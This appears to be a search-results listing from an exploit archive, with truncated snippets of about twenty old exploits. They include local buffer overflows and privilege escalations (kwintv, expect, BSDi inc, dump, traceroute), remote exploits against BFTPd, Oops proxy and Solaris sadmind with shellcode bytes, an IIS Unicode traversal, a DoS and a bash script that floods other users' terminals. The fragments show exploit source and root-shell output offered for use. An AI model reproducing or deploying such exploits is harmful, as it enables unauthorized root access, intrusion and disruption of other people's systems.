2058 matches found
ml2 - Local users can Crash processes
include include include include error int mainint argc, char argv char foo1000; char bigmsg10000; char s, holds; int i = 0; memsetbigmsg, 'X', sizeofbigmsg-1; if argc \n", argv0; exit1; // fork; memsetfoo, 0, sizeoffoo; snprintffoo, sizeoffoo, "/proc/%s/stat", argv1; while accessfoo, FOK == 0 s =...
RedHat 6.16.2 - TTY Flood Users
RedHat 6.16.2 - TTY Flood Users !/bin/bash by teleh0r TTYDIR=/dev/pts NONSENSE=/bin/nice MYTTY=tty To prevent flooding of one's own TTY while /bin/true ; do for i in $TTYDIR/ ; do if -w $i -a -c $i -a $i != $MYTTY ; then cat $NONSENSE $i fi done done unset i milw0rm.com 2001-01-02...
Infinite Interchange 3.61 - Denial of Service
source: https://www.securityfocus.com/bid/2140/info Infinite Interchange is a multi-function email server which supports most common internet protocols. Examples of its functions include an HTTP server and a webmail interface. Unfortunately, Interchange is subject to a denial of service. By...
Oops! 1.4.6 (one russi4n proxy-server) Heap Buffer Overflow Exploit
Exploit for bsd platform in category remote exploits =================================================================== Oops! 1.4.6 one russi4n proxy-server Heap Buffer Overflow Exploit ===================================================================...
BFTPd 1.0.12 Remote Exploit
Exploit for linux platform in category remote exploits =========================== BFTPd 1.0.12 Remote Exploit =========================== / Creates a filename to exploit the bug in bftpd 1.0.12 Create the file, cwd in the shell directory and nlist the file directory. Coded by korty / include...
Kwintv - Local Buffer Overflow
/ kwintv local buffer overflow. gid=video33 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/17/2000 For SuSE 7.0 - x86. sgid "video"33 by default. bash-2.04$ id uid=1000loophole gid=501noc bash-2.04$ ./b 0 Ret-addr 0xbfffe1fc, offset: 0, allign: 0. sh-2.04$ id...
Kwintv - Local Buffer Overflow
Kwintv - Local Buffer Overflow / kwintv local buffer overflow. gid=video33 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/17/2000 For SuSE 7.0 - x86. sgid "video"33 by default. bash-2.04$ id uid=1000loophole gid=501noc bash-2.04$ ./b 0 Ret-addr 0xbfffe1fc,...
expect (/usr/bin/expect) - Local Buffer Overflow
expect (/usr/bin/expect) - Local Buffer Overflow / hhp-expectsmash.c 12/11/00 expect /usr/bin/expect buffer overflow. Tested 5.31.8 and 5.28.1, slackware 7.x Maybe others. By: isox Site: www.hhp-programming.net Advisory: www.hhp-programming.net/ouradvisories/hhp-expectadv%2317.txt / include include...
Solaris sadmind - Remote Buffer Overflow
Solaris sadmind - Remote Buffer Overflow /\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz / include include include include include char shellsparc = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff" "\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"...
Solaris 2.6/7.0 - locale Format Strings noexec stack Overflow
Solaris 2.6/7.0 - locale Format Strings noexec stack Overflow / exploit for locale subsystem format strings bug In Solaris with noexec stack. Tested in Solaris 2.6/7.0 If it won't work, try adjust retloc offset. e.g. ./ex -o -4 $gcc -o ex ex.c ldd /usr/bin/passwd|sed -e...
BSDi 3.0 inc - Local Buffer Overflow Local Privilege Escalation
BSDi 3.0 inc - Local Buffer Overflow Local Privilege Escalation / BSDiincmh buffer overflow, by [email protected]. this is will give you euid=0root on BSDi/3.0 systems. / define PATH "/usr/contrib/mh/bin/inc" / path to inc on BSDi/3.0 / define BUFFER 2048 / no need to change this. / define...
dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation
dump 0.4b15 RedHat 6.2 - Local Privilege Escalation / dump-0.4b15x.c dump-0.4b15 exploit: Redhat 6.2 dump command executes external program with suid privilege. affected: /sbin/dump /sbin/dump.static /sbin/restore /sbin/restore.static Bug found by [email protected] This example was coded by...
HP-UX 11.0 - pppd Local Stack Buffer Overflow
HP-UX 11.0 - pppd Local Stack Buffer Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: HP-UX pppd / / Tested...
Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)
/\ Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit proof of theory exploit cuz it's wednesday and i'm on the couch brought to you by the letter B, the number 7, optyx, and t12 optyx - t12 - greetz go out to aempirei, a gun toatin' gangstah' hustler' player motherfucker who isn'...
MS Windows IIS Unicode Remote Transversal Bug
Exploit for unknown platform in category remote exploits ============================================= MS Windows IIS Unicode Remote Transversal Bug ============================================= / iisex iis exploit grtz to: Bio, nos, zoa, reg and vor... who else would stay up at night to exploit...
xsplumber - strcpy() Local Buffer Overflow
xsplumber - strcpy Local Buffer Overflow / linuxsplumberversion2 buffer overflow, by [email protected]. this is a misc. exploit for the linux-SVGAlib space plumber game. which, as you know needs to be installed setuid root. this overflow is due to a simple oversight in the command line parser. us...
Oracle (oidldapd connect) - Local Command Line Overflow
/ Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd impact: any user gain euid=oracle. Dedicated to PlazaSite guys...
Oracle (oidldapd connect) - Local Command Line Overflow
Oracle oidldapd connect - Local Command Line Overflow / Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd impact:...
LBL Traceroute - Local Privilege Escalation
/ MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the corresponding advisory will be made available at: ftp://maxx.via.ecp.fr/traceroot/ This program is free software; you can redistribute it and/or modif...
News Update 1.1 - Change Admin Password
News Update 1.1 - Change Admin Password / newsexp.c - description ------------------- begin : Sat Oct 21 2000 copyright : C 2000 by Morpheusbd email : [email protected] advisory : www.brightdarkness.de Exploit code for the News Update 1.1 by Morpheusbd For more information see my advisory which...